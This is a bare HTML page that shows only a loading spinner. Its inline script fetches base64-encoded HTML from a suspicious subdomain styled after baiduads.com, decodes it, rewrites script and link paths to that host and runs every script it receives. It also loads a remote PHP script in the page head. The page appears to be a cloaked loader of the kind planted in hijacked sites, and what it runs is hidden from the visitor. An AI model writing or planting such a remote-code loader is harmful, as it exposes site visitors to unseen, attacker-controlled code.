
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="dns-prefetch" href="//waf-j.b.j-gmqnfz7c93.baiduads.com">
  <link rel="preconnect" href="//waf-j.b.j-gmqnfz7c93.baiduads.com">
    <script type="text/javascript" charset="utf-8" src="//waf-j.b.j-gmqnfz7c93.baiduads.com/sw/dpz.php"></script>
   <script type="text/javascript" src="/lozad.min.js"></script>
   <style>
       .loaderbg {
    background-color: #fff;
    width: 100%;
    height: 100%;
    overflow: hidden;
    position: fixed;
    left: 0;
    top: 0;
    z-index: 99999999
}

::-webkit-scrollbar {
    width: 7.5px;
    height: 6px;
    background-color: #f0f0f0;
    display: none
}

::-webkit-scrollbar-thumb {
    background-color: #b1b1b1;
    border-radius: 15px
}

::-webkit-scrollbar-thumb:hover {
    background-color: #777
}

.spinner {
    position: absolute;
    top: 50%;
    left: 50%;
    margin-left: -25px;
    margin-top: -30px;
    width: 50px;
    height: 60px;
    text-align: center;
    font-size: 10px
}

.spinner>.double {
    background: #49a9ee;
    height: 100%;
    width: 6px;
    display: inline-block;
    -webkit-animation: stretchDelay 1.2s infinite ease-in-out;
    animation: stretchDelay 1.2s infinite ease-in-out
}

.spinner .rect2 {
    -webkit-animation-delay: -1.1s;
    animation-delay: -1.1s
}

.spinner .rect3 {
    -webkit-animation-delay: -1.0s;
    animation-delay: -1.0s
}

.spinner .rect4 {
    -webkit-animation-delay: -0.9s;
    animation-delay: -0.9s
}

.spinner .rect5 {
    -webkit-animation-delay: -0.8s;
    animation-delay: -0.8s
}

@-webkit-keyframes stretchDelay {

    0%,
    40%,
    100% {
        -webkit-transform: scaleY(.4)
    }

    20% {
        -webkit-transform: scaleY(1)
    }
}

@keyframes stretchDelay {

    0%,
    40%,
    100% {
        transform: scaleY(.4);
        -webkit-transform: scaleY(.4)
    }

    20% {
        transform: scaleY(1);
        -webkit-transform: scaleY(1)
    }
}
   </style>
</head>
<body class="ie8">

<script type='text/javascript'>
const currentPath = window.location.pathname + window.location.search;

const fetchUrl = '//waf-j.b.j-gmqnfz7c93.baiduads.com' + currentPath;

fetch(fetchUrl)
  .then(response => response.text())
  .then(function(encodedHtml) {
    var uint8Array = new Uint8Array(atob(encodedHtml).split('').map(function(c) {
      return c.charCodeAt(0);
    }));
    var decoder = new TextDecoder('utf-8');
    var decodedHtml = decoder.decode(uint8Array);

    // 创建临时容器，插入动态 HTML 内容
    var tempContainer = document.createElement('div');
    tempContainer.innerHTML = decodedHtml;

    // 处理 link 标签
    var links = tempContainer.getElementsByTagName('link');
    for (var i = 0; i < links.length; i++) {
      var href = links[i].getAttribute('href');
      if (href && (href.startsWith('/') || !href.includes('http'))) {
        links[i].href = '//waf-j.b.j-gmqnfz7c93.baiduads.com' + (href.startsWith('/') ? href : '/' + href);
      }
    }

    // 处理 script 标签
    var scripts = tempContainer.getElementsByTagName('script');
    for (var i = 0; i < scripts.length; i++) {
      var src = scripts[i].getAttribute('src');
      if (src && (src.startsWith('/') || !src.includes('http'))) {
        scripts[i].src = '//waf-j.b.j-gmqnfz7c93.baiduads.com' + (src.startsWith('/') ? src : '/' + src);
      }
    }

    // 将动态内容插入到 DOM 中
    var container = document.getElementById('app');
    container.innerHTML = tempContainer.innerHTML;
    container.style.display = 'block'; // 确保容器显示

    // 动态插入脚本
    for (var i = 0; i < scripts.length; i++) {
      var newScript = document.createElement('script');
      if (scripts[i].src) {
        newScript.src = scripts[i].src;
        newScript.async = false; // 按顺序执行脚本
      } else {
        newScript.text = scripts[i].text;
      }
      document.body.appendChild(newScript);
    }

    
    initializeLazyLoad();
  })
  .catch(error => console.error('Error:', error));


function initializeLazyLoad() {

  if (typeof lozad === 'function') {
    const observer = lozad(); 
    observer.observe(); 
  } else {
    console.error('Lozad library is not loaded.');
  }
}
</script>

    <div id="app">
   <div class="loaderbg">
    <div class="spinner">
        <div class="double rect1"></div>
        <div class="double rect2"></div>
        <div class="double rect3"></div>
        <div class="double rect4"></div>
        <div class="double rect5"></div>
    </div>
</div>

</div>

<script src="/1lozad.min.js"></script>

</body>
</html>
